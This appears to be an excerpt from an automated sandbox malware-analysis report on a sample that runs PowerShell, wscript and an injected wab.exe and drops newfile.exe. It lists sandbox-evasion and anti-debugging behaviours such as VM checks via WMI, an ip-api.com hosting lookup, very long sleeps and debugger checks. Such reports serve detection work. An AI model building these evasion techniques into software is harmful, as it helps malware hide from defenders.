Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 24520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 243F0000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4288	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5587	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7919	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1865	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 5030	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 3983	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\wscript.exe TID: 5884	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3620	Thread sleep count: 7919 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4440	Thread sleep count: 1865 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4616	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2588	Thread sleep count: 5030 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2588	Thread sleep count: 3983 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -99653s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -99542s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -99218s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -99109s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -98999s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -98890s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -98781s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -98671s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -98562s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -98452s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -98343s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -98234s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -98124s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -98015s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -97864s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -97750s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -97637s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -97526s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -97416s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -97311s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -97202s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -97088s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -96962s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -96842s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -96732s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -96624s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -96512s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -96406s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -96296s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -96172s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -96062s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -95953s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -95834s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -95718s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -95604s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -95489s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -95374s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -95265s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -95142s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -95015s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -94902s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99653	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99542	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99218	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99109	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98999	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98890	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98781	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98671	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98562	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98452	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98343	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98234	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98124	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98015	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97864	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97750	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97637	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97526	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97416	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97311	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97202	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97088	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96962	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96842	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96732	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96624	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96512	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96406	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96296	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96172	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96062	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95953	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95834	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95718	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95604	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95489	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95374	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95265	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95142	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95015	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 94902	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: wscript.exe, 00000000.00000002.2079442238.000001EA79156000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.2068606801.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2070156115.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076473394.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069510117.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079541397.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069833388.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.2069751324.000001EA79433000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076795867.000001EA79458000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076362482.000001EA7943B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076183249.000001EA79411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079981179.000001EA7945A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076291584.000001EA7941F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`'
Source: wscript.exe, 00000000.00000003.2068606801.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2070156115.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076473394.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069510117.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079541397.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069833388.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW>
Source: powershell.exe, 00000002.00000002.2924619147.00000243C0710000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllph3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_00A570B8 CheckRemoteDebuggerPresent,

10_2_00A570B8

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_04DCDAAC LdrInitializeThunk,

5_2_04DCDAAC

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe

Code function: 12_2_00382A7E GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,

12_2_00382A7E

Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Code function: 12_2_00383450 SetUnhandledExceptionFilter,		12_2_00383450
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Code function: 12_2_003832C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		12_2_003832C0

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Memory allocated: page read and write | page guard

Jump to behavior

